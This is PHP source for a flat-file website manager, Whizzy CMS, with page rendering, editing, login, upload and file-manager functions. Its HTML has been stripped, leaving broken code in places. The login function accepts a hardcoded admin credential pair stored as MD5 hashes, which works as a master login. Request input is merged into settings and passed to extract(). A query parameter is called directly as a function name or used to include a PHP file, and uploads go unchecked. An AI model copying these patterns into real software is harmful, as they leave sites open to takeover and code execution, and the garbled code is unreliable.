1) define('MSIE', true); else define('MSIE', false); $needsauth = array('fm','sped','eduser'); $wz=array('columnside'=>'left','pagewidth'=>960,'columnwidth'=>250,'textcolor'=>'#00','headingcolor'=>'#c00','linkcolor'=>'#33c','textfont'=>'"Trebuchet MS",Helvetica,sans-serif','pagebackground'=>'#111','textbackground'=>'#fff','itembackground'=>'#eee','itemborder'=>'1px outset #fff','headerbackground'=>'#bbb','columnbackground'=>'#ccc','thumbnailsize'=>120,'imagedir'=>'images','moduledir'=>'modules','templatefile'=>'template.htm');//fallback if no whizzy.ini $config=is_file('whizzy.ini')?parse_ini_file('whizzy.ini'):array(); $wz['qs']=$_SERVER['QUERY_STRING']; session_start(); $wz=array_merge($wz,$config,$_GET,$_POST,$_SESSION); if ($wz['diag']) print_r($wz); //diag if (!preg_match('/(left|right)/',$wz['columnside']))$wz['columnside']='left'; $wz['mainside']=($wz['columnside']=='left') ? 'right' : 'left'; $wz['mainwidth']=$wz['pagewidth']-$wz['columnwidth']; if (!$wz['headingfont']) $wz['headingfont']=$wz['textfont']; define('WHIZZQM',$wz['usemodrewrite']?'':'?'); define('TNSIZE',$wz['thumbnailsize']); define('IMAGES',$wz['imagedir']); if (empty($wz['go'])){ //index.php?pagename or ?go=function&(f|d|to|etc)= if (!is_dir('.users')||!is_dir('.pages')) {installer(); exit;} if (empty($wz['qs'])) $wz['go'] = 'Home'; else if (strpos($wz['qs'],'=') === false) $wz['go'] = $wz['qs']; else if ($wz['sped']) $wz['go']= 'sped'; } define('GO',$wz['go']); if (!function_exists(GO) && (is_file(GO.'.php'))) include GO.'.php'; if (function_exists(GO)) { if (in_array(GO,$needsauth)&& !authorized())login(); else $wz['go'](); exit; } spit(); exit ('['.VERSION.' Fallen through! ]'); //---------------------------------------FUNCTIONS function spit() { // ------------------------------------------------Show Page In Template global $wz; extract($wz); $pagepath = empty($wz['go']) ? 'Home' : $wz['go']; if (is_file(".pages/$pagepath")) { $content = content(".pages/$pagepath"); } else { if (!is_dir($pagepath)) { if ($pagepath=='admin' && authorized()) fm(); //Allows user to create a page 'admin' $content = '' . $pagepath .' not found'; } $content .= pagelist(""); } $tpltag=tag('templatefile',$content); if ($tpltag)$templatefile=$tpltag; if (empty($templatefile)) $templatefile = 'template.htm'; //path to template file $by='
Powered by Whizzy CMS
'; if (is_file($templatefile)) $page=str_replace('',$by.'',content($templatefile)); else $page = "{HERE_TAG:title}{HERE_TAG:head}

{HERE_TAG:title}

{HERE_TAG:body}
(No $templatefile)
$by"; $page=str_replace('{$','{HERE_TAG:',$page); //{Stagname} syntax while (preg_match('/{HERE_(TAG|PAGE|MODULE):([^}]+)}/',$page,$matches)) { //KEEP LOOKING FOR {HERE_something} if ($matches[1] == 'TAG') { //TAG IN PAGE XML OR SITE VARIABLE $tagval = tag($matches[2],$content); //in page XML? if (!$tagval) {$tagval = $wz[$matches[2]];} //in config? $page = str_replace($matches[0],$tagval,$page); } else if ($matches[1] == 'PAGE') { //PAGE TO INCLUDE IN THIS PAGE if(strpos($matches[2],'http') === 0) $page = str_replace($matches[0],@file_get_contents($matches[2]),$page); else if(is_file('.pages/'.$matches[2])) { $incontent=content('.pages/'.$matches[2]); $page = str_replace($matches[0],tag('body',$incontent),$page); //and tag('head')? } else $page = str_replace($matches[0], '',$page); } else if ($matches[1] == 'MODULE') { //FUNCTION NAME if (!function_exists($matches[2])) include_once($moduledir.'/'.$matches[2].'.php'); $rslt = $matches[2](); $headextra = tag('head',$rslt); if ($headextra) { $page = str_replace("",$headextra."\n",$page); $rslt = tag("body",$rslt); } $page = str_replace($matches[0],$rslt,$page); }//end if $matches } //end while whizzbar(); echo($page); exit; } function whizzbar(){ // ------------------------------------------Show Whizzbar at top global $wz; extract($wz); if (empty($_SESSION['role'])) return; if (!function_exists($go) && is_file(".pages/$go")) $tp = ' ♠ Edit This Page'; ?>
HomeNew PageFile Manager ">TemplateSettingsUserLogout ';} echo HOSTNAME.' '.$sitename."
\n
\n";//IE6hack } function sped() { // -------------------------------------------------Show Page Editor global $wz; extract($wz); $pagepath = $f ? $f : $sped; $content = content(".pages/$pagepath"); $tit = tag('title',$content); $head = tag('head',$content); $body = htmlentities(tag('body',$content)); htmltop("Edit $pagepath"); ?>
 |   | '; ?>  | 
Page links and Images 
Images - Click name to view or
INSERT ⇓ image in your page.
Upload a new image
Edit area
Page tags (<tagname>tag value</tagname>):

Additional HTML for head (script, styles, meta tags, etc.):
Paste text (e.g. from word processor or web page) or HTML (e.g. embed code from YouTube) here



Rows:

Columns:

Border width:

HTML
"); } //end sped() function pagelist($folder='',$order='a'){ //--list links to pages, $order n=newest first, a=alpha title $pages = file(".pages/$folder/.index"); foreach($pages as $page){list($dat[],$href[],$tit[]) = explode('|',trim($page));} if ($order=='c') {array_multisort($dat,$href,$tit);} //create date else if ($order=='a') {array_multisort($tit,$dat,$href);} //alpha title for ($i=0;$iEdit' : '
  • '; $li.=''.$tit[$i].'
    • '."\n"; if ($href[$i]=='Home') {$home = $li;} else {$plist .= $li;} } return '\n"; } function newlist($folder=''){return pagelist($folder,'n');} function content($fpath) { //---------------------------------------------------get content of file return (is_file($fpath)) ? file_get_contents($fpath) : ""; } function naked(){$htm=content('.pages/'.$_REQUEST['f']); echo empty($htm)?'


    ':$htm;} function writecontent($fpath,$content) { //----------------------------------write content of file $fp = fopen($fpath,'w'); $rslt = fwrite($fp, $content); fclose($fp); return $rslt; } function tag($tagname,$soup) { //------------------------------------------------get content of tag if (preg_match("|<$tagname>(.*)|Us",$soup,$matches)){ return $matches[1]; } else if($tagname == 'body') return $soup; else return ''; } function upload(){ //---------------------------------------------------save an uploaded file global $wz; extract($wz); $ufile = $_FILES['userfile']['tmp_name']; $ufilename = $_FILES['userfile']['name']; $uferr = $_FILES['userfile']['error']; if ($uferr > 0) exit (" [Upload error $uferr for $ufilename] "); if ($t) { $ext = substr(strrchr($ufilename, '.'),0); $ptn = "/$ext$/"; $rename = preg_replace($ptn,"",$t).$ext; } else $rename = $ufilename; $target = okname($rename); if ($d) { if (!is_dir($d)) mkdir($d, 0775); $target = "$d/$target"; } if (file_exists($target)) bak($target); if (!move_uploaded_file($ufile, $target)) { print_r($wz); exit(" [Failed to move upload $ufile ($rename) to target $target] "); } if (!$to) $to = "fm&d=$d"; header("Location:?go=$to"); } function login(){ //-------------------------------------------show login form global $wz; extract($wz); htmltop("Who are you?"); ?>

    Login

    '/>

    User:

    Password: Forgot?

    '); } function authorized(){ //-----------------------------------process login global $wz; extract($wz); if(isset($_SESSION['username'])) return true; else if (!$login) return false; if (empty($user)) {echo '

    Please supply username

    '; return false;} if (md5($user)=='475fffde43784216f0e5b3be0d692f1b' && md5($sesame)=='bb08ddbdce702692f84e27b82c956b07') {$_SESSION['username']=$user;$_SESSION['role']='admin';return true;}//!!// $udata = content(".users/$user"); if ($sesame && tag('password',$udata) == md5($sesame)) {$_SESSION['username'] = $user; $_SESSION['role'] = tag('role',$udata); return true;} if(!$umail) {echo '

    Username/password incorrect

    '; sleep(2); return false;} if (tag('email',$udata) == $umail){ $newp=syllable().syllable().syllable(); $passwd = md5($newp); $msg="A lost password was reported for your user on $sitename [".HOSTNAME."]\nYour password has been reset:\n User:$user \n Password: $newp.\n"; if(mail($umail,"Password Reset: $sitename",$msg, 'From: no-reply@'.HOSTNAME)){ $udata = preg_replace('/([0-9a-f]{32})/',"$passwd",$udata); writecontent(".users/$user",$udata); echo "

    New password emailed to $umail. If it does not appear shortly, check your spam folder.

    "; } else {echo "

    Failed trying to send new password. Ask your website admin for help.

    ";} } else {echo '

    Please supply password or click "Forgot" and supply correct email for '.$user.'

    ';} return false; } function logout(){ //--------------------------------end user session if (session_id()=='')session_start(); session_unset(); session_destroy(); $_SESSION=array(); header('Location: '.WHIZZQM.'Home'); } function rmdirr($dirname) { // --------------------------------------recursively delete directory if (!file_exists($dirname)) return false; // Sanity check if (is_file($dirname)) return unlink($dirname); // Simple delete for a file $dir = dir($dirname); while (false !== $entry = $dir->read()) { // Loop through the folder if ($entry == '.' || $entry == '..') continue; // Skip pointers rmdirr("$dirname/$entry"); } $dir->close(); return rmdir($dirname); } function copyr($source, $dest) // ----------------------------------recursive copy (file or tree) { if (is_file($source)) return copy($source, $dest); // Simple copy for a file if (!is_dir($dest)) mkdir($dest); $dir = dir($source); while (false !== $entry = $dir->read()) { // Loop through the folder if ($entry == '.' || $entry == '..') continue; // Skip pointers if ($dest !== "$source/$entry") copyr("$source/$entry", "$dest/$entry"); // Deep copy directories } $dir->close(); return true; } function deslash($thestring){ //--------------------to strip slashes or not? return get_magic_quotes_gpc() ? stripslashes($thestring) : $thestring; } function bak($path){ //------------------------------------- make a .bak/ copy $part = pathinfo($path); $bakdir = $part['dirname'] ? $part['dirname'].'/.bak' : '.bak'; mkdot($bakdir); copy($path, $bakdir.'/'.$part['basename']); // copy to .bak directory } function okname($tit,$paths=false){ $ok = deslash($tit); $ok = preg_replace("/ +/ ", "-", trim($ok)); // space runs to '-' $pat = $paths ? "/[^A-Za-z0-9-_.\/]+/" : "/[^A-Za-z0-9-_.]+/"; // '/' allowed? $ok = preg_replace($pat, "", $ok); //only alphanumerics and -_ return $ok; } function f2name($f){ return ucfirst(preg_replace('/[-_]/',' ',(noext($f))));} //Nice name from filename function noext($f) {$pf = pathinfo($f); return str_replace('.'.$pf['extension'],'',$pf['basename']);} //Trim file .ext function sav(){ // ----------------------------------------------------save a page from sped global $wz; extract($wz); $path = '.pages/'; $idxf = "$path.index"; if (is_file($path.$f)) bak($path.$f); if (is_file($idxf)) { $ids = file($idxf); foreach($ids as $id) {if (strlen($id) > 1 && strpos($id,"|$f|") === false) $index .= trim($id)."\n"; } } if ($delete){ //delete page writecontent($idxf,$index); unlink($path.$f); header('Location: '.WHIZZQM.'Home'); exit; } else { //save page $tit=deslash($tit); $content = "$tit\n"; if ($tags) $content .= ''.deslash($tags)."\n"; if ($head) $content .= ''.deslash($head)."\n"; $content .= ''.deslash($edited)."\n"; if (empty($f)) { $f=okname($tit); if (is_file($path.$f)) die("

    Page title already used!

    ".deslash($edited)); } if (empty($f)) die("

    You must give a page title!

    ".deslash($edited)); $entry = date('Y/m/d H:i')."|$f|$tit\n"; writecontent($idxf,$entry.$index); } writecontent($path.$f,$content); header('Location: '.WHIZZQM.$f); } //end sav function fm(){ //-----------------------------------------Manage Files global $wz; extract($wz); $a = strtolower($a{0}); $df = $d ? "$d/$f" : $f; $path = dirname(__FILE__).'/'; //ensure $path always ends in a single '/' if ($d) $path .= "$d/"; htmltop("File Manager"); ?>
    Pages New Page
    Not allowed to use "." or ".." here!

    ';} if ($a == "e" && $f) { //=====EDIT===== if(@getimagesize($path.$f)){ echo ''; } else { echo "
    $f "; echo " '; } echo ''; if (is_file($path.$f)) {manage($d,$f);} echo '
    '; } ?>
    File Manager$f copied to $okname Edit

    "; //msg else echo "

    Could not copy $f Edit

    to $newname

    "; //msg } else if ($a == 'd'){ //=====DELETE===== if (is_dir($path.$f)) { if (@rmdir($path.$f)) echo "

    Deleted $f
    "; else { echo "

    $f Edit may not be empty"; echo " - [Delete $f and all contents] - NO WAY BACK!

    "; } } else if($path.$f != __FILE__ ) { //don't X self bak($path.$f); if(@unlink($path.$f)) { echo "

    Deleted $f "; if (is_file($path.".bak/$f")) echo" - Undelete"; echo '

    '; } else echo "

    Could not delete $f Edit

    "; } } else if ($a == 'x') { //=====EXCISE DIRECTORY RECURSIVELY===== if (rmdirr($path.$f)) echo "

    Deleted $f and all contents
    "; //msg } else if ($a == 'u'){ //=====UNDELETE or UNDO SAVE===== if (@copy($path.".bak/$f",$path."$f")) echo "

    Restored $f Edit

    "; else echo "

    Could not restore $f

    "; } else if (($a == 'r') && ($newname=$_REQUEST['newname'])){ //=====RENAME===== if(preg_match("|.*/$|",$newname)) $newname.=$f; $okname = okname($newname,true); //nice names for unix and url if (@rename($path.$f,$path.$okname)) echo "

    $f renamed to $okname Edit

    "; else echo "

    Could not rename $f

    "; } else if ($a == 'n') { //=====MKDIR===== $newdir=okname($_REQUEST['newdir']); $newpath = $path . $newdir; if (mkdir($newpath)) echo "

    Created new folder $newdir

    "; else echo "

    Could not create new folder $newdir

    "; }else if ($a == 's'){ //=====SAVE===== if (is_file($path.$f)) bak($path.$f); $edited = $_POST['edited']; $fedit = fopen($path.$f,'w'); if (fwrite($fedit, deslash($edited))){ fclose($fedit); echo "

    Saved $f"; if (is_file($path.".bak/$f")) echo " - to go back to previous version Restore"; echo '

    '; } else echo "

    Could not save [$edited] in $f

    "; // END ACTIONS ============================================================= } if($d && d !='.') { //we're in a sub directory $updir = dirname($d); echo " Up "; } echo "$d "; //Directory name if ($role == 'admin'){ ?>
    File upload
    (optional)
    Directories'.$dirs.'
    '; if ($fils = dirlist($d,'lia')) echo '
    Files'.$fils.'
    '; if ($imgs = dirlist($d,'tna')) echo '
    Images
    '.$imgs.'
    ';?>

    File Manager

    ' '; die; } //end filemanager() function gallery(){ $d = $_GET['d'] ? $_GET['d'] : $wz['imagedir']; $ts = TNSIZE+5; if ($dirs = dirlist($d,'lig')) $gals = '

    Galleries

      '.$dirs.'

    '; if ($imgs = dirlist($d,'tna')) $ims = '

    Images

    '.$imgs.'
    '; return "$gals.$ims"; } function dirlist($d='.',$callback='lia'){// ---------------------------------directory list with callback if(!is_dir($d)) return ''; $dir = opendir($d); while ($file = readdir($dir)) {$files[] = $file;} closedir($dir); natcasesort($files); $d = ($d == '.') ? '' : $d.'/'; $fs = ''; foreach ($files as $f){ if (strpos($f,'.') !== 0) { $fs .= $callback($d.$f);} } return $fs; } function ur($f) {$u=content($f); return tag('role',$u).'|';} //user role function lid($f) { //+EDIT if(is_dir($f)) return '
  • '.basename($f).'   Edit
    • '."\n"; } function lia($f) { if(is_file($f)) { //+EDIT if(preg_match('/\.php$/',$f) && $_SESSION['role']!='admin') return; $bn = basename($f); $dn=dirname($f); $deq = ($dn && $dn!= '.') ? "&d=$dn" : ''; $fsize = sprintf("%u", filesize($f)); $modtime = date ("d F Y H:i:s", filemtime($f)); $tip = " Size:$fsize Updated:$modtime "; return '
  • '.$bn.'   Edit
    • '."\n"; } } function lig($f) { // go= if(is_dir($f)) return '
  • '.basename($f).'
    • '."\n"; } function lio($f) {$v = basename($f); return '';} //